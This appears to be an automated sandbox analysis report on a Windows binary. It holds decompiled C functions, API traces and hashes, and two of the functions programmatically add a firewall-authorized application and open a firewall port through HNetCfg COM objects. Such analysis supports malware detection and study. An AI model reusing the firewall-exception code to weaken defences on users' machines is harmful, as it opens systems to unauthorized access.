0x00011487
0x0001148f
0x00011495
0x0001149d
0x000114a3
0x000114ac
0x000114b9
0x000114bb
0x000114c0
0x000114c2
0x000114cb
0x000114ce
0x000114d7
0x000114da
0x000114e3
0x000114e6
0x000114ee
0x000114f1
0x000114fa
0x00011500
0x00011508
0x0001150e
0x00011516
0x0001151c
0x00011528
0x00011528
0x000114c0
0x0001152c
0x0001152e
0x0001140b
0x000113f3
0x000113db
0x0001152f
0x00011534
0x00011539
0x00011539
0x0001153c
0x00011541
0x00011546
0x00011546
0x00011549
0x0001154e
0x00011553
0x00011553
0x0001155a
0x0001155c
0x0001155c
0x00011566

APIs

_com_util::ConvertStringToBSTR.COMSUPP ref: 00011391
_com_util::ConvertStringToBSTR.COMSUPP ref: 0001139E

Part of subcall function 000180F0: lstrlenA.KERNEL32(?,D014837C,?,80004005,?,000000FE,?,00011112,00000000), ref: 00018137
Part of subcall function 000180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00011112,00000000), ref: 0001814D
Part of subcall function 000180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00011112,00000000), ref: 0001815C
Part of subcall function 000180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00011112,00000000), ref: 000181EB
Part of subcall function 000180F0: GetLastError.KERNEL32(?,000000FE,?,00011112,00000000), ref: 00018206
Part of subcall function 000180F0: SysAllocString.OLEAUT32(00000000), ref: 00018221

_com_util::ConvertStringToBSTR.COMSUPP ref: 000113A9

Part of subcall function 000180F0: _malloc.LIBCMT ref: 000181A1

CoInitializeEx.OLE32(00000000,00000002,80004005,ThunderNetWork,?), ref: 000113B4
CoCreateInstance.OLE32(0001DB2C,00000000,00000001,0001DB3C,?), ref: 0001143C
CoCreateInstance.OLE32(0001DB2C,00000000,00000001,0001DB3C,?), ref: 000114B9
CoUninitialize.OLE32 ref: 0001155C

Strings

ThunderNetWork, xrefs: 00011396

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$ByteCharCreateErrorInstanceLastMultiWide$AllocInitializeUninitialize_malloclstrlen
String ID: ThunderNetWork
API String ID: 3644708077-3075295172
Opcode ID: 4711f263b16dcf1014e8e8d80a7c66d6e833c0c7597d71f3a975409dd1b2bcd3
Instruction ID: e059ff05fe07df21d28b38b82a4d7bb77559915ebf884e3209a6c0ffd82ea7f5
Opcode Fuzzy Hash: 4711f263b16dcf1014e8e8d80a7c66d6e833c0c7597d71f3a975409dd1b2bcd3
Instruction Fuzzy Hash: 2971B575A00219EFCB04DFE4C888ADEBBBABF49714F204499F506EB251CB759A81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 000174CC, Relevance: 6.1, APIs: 4, Instructions: 93
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E000174CC(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				long _t21;
				long _t23;
				long _t24;
				void* _t25;
				long _t31;
				signed int _t32;
				signed int _t33;
				signed int _t39;
				signed int _t45;
				long _t49;
				void* _t52;
				void* _t53;

				_push(0xc);
				_push(0x1dec8);
				E00013F70(__ebx, __edi, __esi);
				_t39 =  *(_t52 + 8);
				if(_t39 <= 0) {
					L4:
					_t49 = _t39 *  *(_t52 + 0xc);
					 *(_t52 + 8) = _t49;
					__eflags = _t49;
					if(_t49 == 0) {
						_t49 = 1;
						__eflags = 1;
					}
					do {
						_t38 = 0;
						 *(_t52 - 0x1c) = 0;
						__eflags = _t49 - 0xffffffe0;
						if(_t49 > 0xffffffe0) {
							L13:
							__eflags = _t38;
							if(_t38 != 0) {
								L21:
								_t21 = _t38;
								L22:
								return E00013FB5(_t21);
							}
							__eflags =  *0x20a20; // 0x0
							if(__eflags == 0) {
								__eflags = _t38;
								if(_t38 == 0) {
									_t23 =  *(_t52 + 0x10);
									__eflags = _t23;
									if(_t23 != 0) {
										 *_t23 = 0xc;
									}
								}
								goto L21;
							}
							goto L15;
						}
						__eflags =  *0x20a98 - 3;
						if( *0x20a98 != 3) {
							L11:
							__eflags = _t38;
							if(_t38 != 0) {
								goto L21;
							}
							L12:
							_t25 = RtlAllocateHeap( *0x2093c, 8, _t49); // executed
							_t38 = _t25;
							goto L13;
						}
						_t49 = _t49 + 0x0000000f & 0xfffffff0;
						 *(_t52 + 0xc) = _t49;
						__eflags =  *(_t52 + 8) -  *0x20a84; // 0x0
						if(__eflags > 0) {
							goto L11;
						}
						E00013C3D(0, 4);
						 *((intOrPtr*)(_t52 - 4)) = 0;
						_push( *(_t52 + 8));
						 *(_t52 - 0x1c) = E00016CFF();
						 *((intOrPtr*)(_t52 - 4)) = 0xfffffffe;
						E000175C8();
						_t38 =  *(_t52 - 0x1c);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L12;
						}
						E00014E20(0, _t38, 0,  *(_t52 + 8));
						_t53 = _t53 + 0xc;
						goto L11;
						L15:
						_t24 = E000145B5(_t49);
						__eflags = _t24;
					} while (_t24 != 0);
					_t31 =  *(_t52 + 0x10);
					__eflags = _t31;
					if(_t31 != 0) {
						 *_t31 = 0xc;
					}
					L3:
					_t21 = 0;
					goto L22;
				}
				_t32 = 0xffffffe0;
				_t33 = _t32 / _t39;
				_t45 = _t32 % _t39;
				asm("sbb eax, eax");
				_t58 = _t33 + 1;
				if(_t33 + 1 != 0) {
					goto L4;
				} else {
					 *((intOrPtr*)(E000138CA(_t58))) = 0xc;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00013862(_t45, 0, __esi);
					goto L3;
				}
			}

0x000174cc
0x000174ce
0x000174d3
0x000174d8
0x000174df
0x0001750f
0x00017513
0x00017515
0x00017518
0x0001751a
0x0001751e
0x0001751e
0x0001751e
0x0001751f
0x0001751f
0x00017521
0x00017524
0x00017527
0x00017592
0x00017592
0x00017594
0x000175e2
0x000175e2
0x000175e4
0x000175e9
0x000175e9
0x00017596
0x0001759c
0x000175d1
0x000175d3
0x000175d5
0x000175d8
0x000175da
0x000175dc
0x000175dc
0x000175da
0x00000000
0x000175d3
0x00000000
0x0001759c
0x00017529
0x00017530
0x0001757d
0x0001757d
0x0001757f
0x00000000
0x00000000
0x00017581
0x0001758a
0x00017590
0x00000000
0x00017590
0x00017535
0x00017538
0x0001753e
0x00017544
0x00000000
0x00000000
0x00017548
0x0001754e
0x00017551
0x0001755a
0x0001755d
0x00017564
0x00017569
0x0001756c
0x0001756e
0x00000000
0x00000000
0x00017575
0x0001757a
0x00000000
0x0001759e
0x0001759f
0x000175a5
0x000175a5
0x000175ad
0x000175b0
0x000175b2
0x000175b8
0x000175b8
0x00017508
0x00017508
0x00000000
0x00017508
0x000174e3
0x000174e6
0x000174e6
0x000174eb
0x000174ed
0x000174ee
0x00000000
0x000174f0
0x000174f5
0x000174fb
0x000174fc
0x000174fd
0x000174fe
0x000174ff
0x00017500
0x00000000
0x00017505

APIs

__lock.LIBCMT ref: 00017548
___sbh_alloc_block.LIBCMT ref: 00017554
_memset.LIBCMT ref: 00017575
RtlAllocateHeap.NTDLL(00000008,?,0001DEC8,0000000C,00015589,00000000,?,00000000,00000000,00000000,?,0001334F,00000001,00000214,?,00000000), ref: 0001758A

Part of subcall function 000138CA: __getptd_noexit.LIBCMT ref: 000138CA

Part of subcall function 00013862: __decode_pointer.LIBCMT ref: 0001386D

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap___sbh_alloc_block__decode_pointer__getptd_noexit__lock_memset
String ID:
API String ID: 3771094184-0
Opcode ID: 7d7a6622efa1b2e2e2537df2ae55c8da837472592a2a190f035b0c15b51686df
Instruction ID: c737b0521b3c4a3b4861d95e13f87848e5764e318c8f48c30699521665814fbe
Opcode Fuzzy Hash: 7d7a6622efa1b2e2e2537df2ae55c8da837472592a2a190f035b0c15b51686df
Instruction Fuzzy Hash: E821A271908F049BDB62AF68CC819DD7BB3EB55360F648615F81E9B192DBB48EC18B40

Uniqueness

Uniqueness Score: -1.00%

Function 00012087, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00012087(int _a4) {

				E0001205C(_a4);
				ExitProcess(_a4);
			}

0x0001208f
0x00012098

APIs

___crtCorExitProcess.LIBCMT ref: 0001208F

Part of subcall function 0001205C: GetModuleHandleW.KERNEL32(mscoree.dll,?,00012094,00000000,?,0001740E,000000FF,0000001E,?,0001553F,00000000,00000001,00000000,?,00013BC7,00000018), ref: 00012066
Part of subcall function 0001205C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00012076

ExitProcess.KERNEL32 ref: 00012098

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 1429ed0eaa8b552d955e23b16956414f8b5138f643bd37534d7de5f51a91a3df
Instruction ID: a60b5ef3fd94e82a08df6c02152c1297ac5158e8f4868ceb0414b036a3c12dac
Opcode Fuzzy Hash: 1429ed0eaa8b552d955e23b16956414f8b5138f643bd37534d7de5f51a91a3df
Instruction Fuzzy Hash: 33B09B31000108FBDB122F11DC09CC97F15DB443907148110F40805072DF71DD93DA90

Uniqueness

Uniqueness Score: -1.00%

Function 00014D4A, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00014D4A(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x2093c = _t6;
				if(_t6 != 0) {
					 *0x20a98 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x00014d5f
0x00014d65
0x00014d6c
0x00014d73
0x00014d79
0x00014d6f
0x00014d6f
0x00014d6f

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00014D5F

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 92bbb36941c2dd81e4456e643eed87d6a4de5e53d7c3629461f008c8b6e0f44e
Instruction ID: 11cdf151ecd57d0371f9c00072257cecf7ac07c0a3270df2703e1498f6fc21f5
Opcode Fuzzy Hash: 92bbb36941c2dd81e4456e643eed87d6a4de5e53d7c3629461f008c8b6e0f44e
Instruction Fuzzy Hash: F6D0A7766907099EFB115F717C09B663BDCD784395F208436B80DC65A1F678C9C1CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000122A3, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E000122A3(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00012177(_t3, _t4, _t5, _t6, _t9); // executed
				return _t2;
			}

0x000122a8
0x000122aa
0x000122ac
0x000122af
0x000122b8

APIs

_doexit.LIBCMT ref: 000122AF

Part of subcall function 00012177: __lock.LIBCMT ref: 00012185
Part of subcall function 00012177: __decode_pointer.LIBCMT ref: 000121BC
Part of subcall function 00012177: __decode_pointer.LIBCMT ref: 000121D1
Part of subcall function 00012177: __decode_pointer.LIBCMT ref: 000121FB
Part of subcall function 00012177: __decode_pointer.LIBCMT ref: 00012211
Part of subcall function 00012177: __decode_pointer.LIBCMT ref: 0001221E
Part of subcall function 00012177: __initterm.LIBCMT ref: 0001224D
Part of subcall function 00012177: __initterm.LIBCMT ref: 0001225D

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: a20d17f4e058708641d46fe1ad9f8ad59c491551924afb0c06fb4aa2578baaf7
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: 79B0123268030C33DA206542EC03F863F0D8BD1B60F240020FB0C1D1E2A9A3B9B2C0C9

Uniqueness

Uniqueness Score: -1.00%

Function 00013148, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00013148() {
				void* _t1;

				_t1 = E000130D6(0); // executed
				return _t1;
			}

0x0001314a
0x00013150

APIs

__encode_pointer.LIBCMT ref: 0001314A

Part of subcall function 000130D6: TlsGetValue.KERNEL32(00000000,?,0001314F,00000000,00015F7B,00020398,00000000,00000314,?,00013A4C,00020398,Microsoft Visual C++ Runtime Library,00012010), ref: 000130E8
Part of subcall function 000130D6: TlsGetValue.KERNEL32(00000004,?,0001314F,00000000,00015F7B,00020398,00000000,00000314,?,00013A4C,00020398,Microsoft Visual C++ Runtime Library,00012010), ref: 000130FF
Part of subcall function 000130D6: RtlEncodePointer.NTDLL(00000000,?,0001314F,00000000,00015F7B,00020398,00000000,00000314,?,00013A4C,00020398,Microsoft Visual C++ Runtime Library,00012010), ref: 0001313D

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 8d2a3ce7ded5aed0e992a8577cc6160a60f6ed2cefe62cf1a4f0177d8c35d2de
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00011C57, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00011C57(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x1f008; // 0xd014837c
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x20128 = _t6;
				 *0x20124 = _t22;
				 *0x20120 = _t25;
				 *0x2011c = _t21;
				 *0x20118 = _t27;
				 *0x20114 = _t26;
				 *0x20140 = ss;
				 *0x20134 = cs;
				 *0x20110 = ds;
				 *0x2010c = es;
				 *0x20108 = fs;
				 *0x20104 = gs;
				asm("pushfd");
				_pop( *0x20138);
				 *0x2012c =  *_t31;
				 *0x20130 = _v0;
				 *0x2013c =  &_a4;
				 *0x20078 = 0x10001;
				_t11 =  *0x20130; // 0x0
				 *0x2002c = _t11;
				 *0x20020 = 0xc0000409;
				 *0x20024 = 1;
				_t12 =  *0x1f008; // 0xd014837c
				_v812 = _t12;
				_t13 =  *0x1f00c; // 0x2feb7c83
				_v808 = _t13;
				 *0x20070 = IsDebuggerPresent();
				_push(1);
				E00014E10(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x1c1b4);
				if( *0x20070 == 0) {
					_push(1);
					E00014E10(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00011c57
0x00011c57
0x00011c57
0x00011c57
0x00011c57
0x00011c57
0x00011c57
0x00011c5d
0x00011c5f
0x00011c5f
0x000124f7
0x000124fc
0x00012502
0x00012508
0x0001250e
0x00012514
0x0001251a
0x00012521
0x00012528
0x0001252f
0x00012536
0x0001253d
0x00012544
0x00012545
0x0001254e
0x00012556
0x0001255e
0x00012569
0x00012573
0x00012578
0x0001257d
0x00012587
0x00012591
0x00012596
0x0001259c
0x000125a1
0x000125ad
0x000125b2
0x000125b4
0x000125bc
0x000125c7
0x000125d4
0x000125d6
0x000125d8
0x000125dd
0x000125f1

APIs

IsDebuggerPresent.KERNEL32 ref: 000125A7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 000125BC
UnhandledExceptionFilter.KERNEL32(0001C1B4), ref: 000125C7
GetCurrentProcess.KERNEL32(C0000409), ref: 000125E3
TerminateProcess.KERNEL32(00000000), ref: 000125EA

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: f65fdea0c60fa31e1928f54574aa5b6a3b30c20ca11f7a21752fe723e1f3ca3a
Instruction ID: dd8f08139f08e3a2b46c272f2e288aab10a7ff8163b2226254f2e1ce774f82a9
Opcode Fuzzy Hash: f65fdea0c60fa31e1928f54574aa5b6a3b30c20ca11f7a21752fe723e1f3ca3a
Instruction Fuzzy Hash: D221C0B4841304DFF762DF64F889A847BA0BB0C310F20815AE90887672D7B899A6CF49

Uniqueness

Uniqueness Score: -1.00%

Function 000117BE, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 164
comCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E000117BE(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t54;
				void* _t59;
				intOrPtr* _t60;
				intOrPtr* _t61;
				intOrPtr* _t62;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				void* _t78;
				void* _t80;
				void* _t83;
				intOrPtr* _t90;
				intOrPtr* _t92;
				intOrPtr* _t94;
				intOrPtr* _t96;
				void* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				signed int _t120;

				_t115 = __edx;
				_t54 =  *0x1f008; // 0xd014837c
				_v8 = _t54 ^ _t120;
				_v52 = _a4;
				_v48 = _a8;
				__imp__CoInitialize(0);
				_v36 = 0;
				_v32 = 0;
				_v40 = 0;
				_v44 = 0;
				_v28 = 0;
				_t59 = E000180F0(__edx, "HNetCfg.FwMgr");
				__imp__CLSIDFromProgID(_t59,  &_v24);
				_t117 = _t59;
				if(_t59 >= 0) {
					_t100 = __imp__CoCreateInstance;
					_t74 =  *_t100( &_v24, 0, 5, 0x1c17c,  &_v36);
					_t117 = _t74;
					if(_t74 >= 0) {
						_t75 = _v36;
						_t115 =  &_v32;
						_t76 =  *((intOrPtr*)( *_t75 + 0x1c))(_t75,  &_v32);
						_t117 = _t76;
						if(_t76 >= 0) {
							_t77 = _v32;
							_t115 =  &_v40;
							_t78 =  *((intOrPtr*)( *_t77 + 0x1c))(_t77,  &_v40);
							_t117 = _t78;
							if(_t78 >= 0) {
								_t80 = E000180F0( &_v40, "HNetCfg.FwAuthorizedApplication");
								__imp__CLSIDFromProgID(_t80,  &_v24);
								_t117 = _t80;
								if(_t80 >= 0) {
									_t83 =  *_t100( &_v24, 0, 5, 0x1c17c,  &_v28);
									_t117 = _t83;
									if(_t83 >= 0) {
										 *((intOrPtr*)( *_v28 + 0x28))(_v28, E000180F0( &_v40, _v48));
										 *((intOrPtr*)( *_v28 + 0x20))(_v28, E000180F0(_t115, _v52));
										_t90 = _v28;
										 *((intOrPtr*)( *_t90 + 0x38))(_t90, 0);
										_t92 = _v28;
										 *((intOrPtr*)( *_t92 + 0x30))(_t92, 2);
										_t94 = _v28;
										 *((intOrPtr*)( *_t94 + 0x48))(_t94, 1);
										_t96 = _v40;
										_t115 =  &_v44;
										_t97 =  *((intOrPtr*)( *_t96 + 0x50))(_t96,  &_v44);
										_t117 = _t97;
										if(_t97 >= 0) {
											_t98 = _v44;
											_t117 =  *((intOrPtr*)( *_t98 + 0x20))(_t98, _v28);
										}
									}
								}
							}
						}
					}
				}
				_t60 = _v28;
				if(_t60 != 0) {
					 *((intOrPtr*)( *_t60 + 8))(_t60);
				}
				_t61 = _v44;
				if(_t61 != 0) {
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				_t62 = _v40;
				if(_t62 != 0) {
					 *((intOrPtr*)( *_t62 + 8))(_t62);
				}
				_t63 = _v32;
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 8))(_t63);
				}
				_t64 = _v36;
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 8))(_t64);
				}
				__imp__CoUninitialize();
				return E00011C57(_t117, _t100, _v8 ^ _t120, _t115, 0, _t117);
			}

0x000117be
0x000117c4
0x000117cb
0x000117d4
0x000117dd
0x000117e0
0x000117ef
0x000117f2
0x000117f5
0x000117f8
0x000117fb
0x000117fe
0x00011804
0x0001180a
0x0001180e
0x00011814
0x0001182a
0x0001182c
0x00011830
0x00011836
0x0001183b
0x00011840
0x00011843
0x00011847
0x0001184d
0x00011852
0x00011857
0x0001185a
0x0001185e
0x0001186d
0x00011873
0x00011879
0x0001187d
0x00011893
0x00011895
0x00011899
0x000118ac
0x000118c0
0x000118c3
0x000118ca
0x000118cd
0x000118d5
0x000118d8
0x000118e0
0x000118e3
0x000118e8
0x000118ed
0x000118f0
0x000118f4
0x000118f6
0x00011902
0x00011902
0x000118f4
0x00011899
0x0001187d
0x0001185e
0x00011847
0x00011830
0x00011904
0x00011909
0x0001190e
0x0001190e
0x00011911
0x00011916
0x0001191b
0x0001191b
0x0001191e
0x00011923
0x00011928
0x00011928
0x0001192b
0x00011930
0x00011935
0x00011935
0x00011938
0x0001193d
0x00011942
0x00011942
0x00011945
0x0001195b

APIs

CoInitialize.OLE32(00000000), ref: 000117E0
_com_util::ConvertStringToBSTR.COMSUPP ref: 000117FE
CLSIDFromProgID.OLE32(00000000,HNetCfg.FwMgr,?), ref: 00011804
CoCreateInstance.OLE32(?,00000000,00000005,0001C17C,?), ref: 0001182A
_com_util::ConvertStringToBSTR.COMSUPP ref: 0001186D

Part of subcall function 000180F0: lstrlenA.KERNEL32(?,D014837C,?,80004005,?,000000FE,?,00011112,00000000), ref: 00018137
Part of subcall function 000180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,80004005,?,000000FE,?,00011112,00000000), ref: 0001814D
Part of subcall function 000180F0: GetLastError.KERNEL32(?,80004005,?,000000FE,?,00011112,00000000), ref: 0001815C
Part of subcall function 000180F0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,000000FE,?,00011112,00000000), ref: 000181EB
Part of subcall function 000180F0: GetLastError.KERNEL32(?,000000FE,?,00011112,00000000), ref: 00018206
Part of subcall function 000180F0: SysAllocString.OLEAUT32(00000000), ref: 00018221

CLSIDFromProgID.OLE32(00000000,HNetCfg.FwAuthorizedApplication,?), ref: 00011873
CoCreateInstance.OLE32(?,00000000,00000005,0001C17C,?), ref: 00011893
_com_util::ConvertStringToBSTR.COMSUPP ref: 000118A3

Part of subcall function 000180F0: _malloc.LIBCMT ref: 000181A1

_com_util::ConvertStringToBSTR.COMSUPP ref: 000118B7
CoUninitialize.OLE32 ref: 00011945

Strings

HNetCfg.FwAuthorizedApplication, xrefs: 00011868
HNetCfg.FwMgr, xrefs: 000117EA

Memory Dump Source

Source File: 00000015.00000002.410276427.0000000000011000.00000020.00020000.sdmp, Offset: 00010000, based on PE: true

Associated: 00000015.00000002.410268187.0000000000010000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410309689.000000000001C000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.410320447.000000000001F000.00000004.00020000.sdmp Download File
Associated: 00000015.00000002.410341332.0000000000021000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Convert_com_util::$ByteCharCreateErrorFromInstanceLastMultiProgWide$AllocInitializeUninitialize_malloclstrlen
String ID: HNetCfg.FwAuthorizedApplication$HNetCfg.FwMgr
API String ID: 4233194485-1951265404
Opcode ID: d479e6ff2eaec5b761e0f47397dbb724a12566d3e7ec40c0fa66d9ea65652453
Instruction ID: 8901dde72c25c1cd25c8fbe344cd6a5545c5741f369f56f22ccb6dd2357d1308
Opcode Fuzzy Hash: d479e6ff2eaec5b761e0f47397dbb724a12566d3e7ec40c0fa66d9ea65652453
Instruction Fuzzy Hash: 47512C71E00219AFCB10DBA8C888DEEF7B9EF8D710B144555FA15EB251DB35AD81CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0001195C, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 178
comCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0001195C(char* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				void* _t66;
				intOrPtr* _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t83;
				intOrPtr* _t84;
				void* _t85;
				void* _t87;
				void* _t90;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				void* _t107;
				intOrPtr* _t108;
				char _t130;
				signed int _t133;

				_t128 = __edx;
				_t61 =  *0x1f008; // 0xd014837c
				_v8 = _t61 ^ _t133;
				_v56 = _a4;
				_t130 = 0;
				_v60 = _a8;
				__imp__CoInitialize(0);
				_v32 = 0;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v28 = 0;
				_t66 = E000180F0(__edx, "HNetCfg.FwMgr");
				__imp__CLSIDFromProgID(_t66,  &_v24);
				_t110 = _t66;
				if(_t66 >= 0) {
					_t129 = __imp__CoCreateInstance;
					_t81 =  *_t129( &_v24, 0, 5, 0x1c17c,  &_v32);
					_t110 = _t81;
					if(_t81 >= 0) {
						_t82 = _v32;
						_t128 =  &_v44;
						_t83 =  *((intOrPtr*)( *_t82 + 0x1c))(_t82,  &_v44);
						_t110 = _t83;
						if(_t83 >= 0) {
							_t84 = _v44;
							_t128 =  &_v40;
							_t85 =  *((intOrPtr*)( *_t84 + 0x1c))(_t84,  &_v40);
							_t110 = _t85;
							if(_t85 >= 0) {
								_t87 = E000180F0( &_v40, "HNetCfg.FwOpenPort");
								__imp__CLSIDFromProgID(_t87,  &_v24);
								_t110 = _t87;
								if(_t87 >= 0) {
									_t90 =  *_t129( &_v24, 0, 5, 0x1c17c,  &_v28);
									_t110 = _t90;
									if(_t90 >= 0) {
										_t129 = _v60;
										_v52 = 0;
										_v48 = 0x100;
										if(E00011071(_v60,  &_v48,  &_v52) != 0) {
											_t93 = _v28;
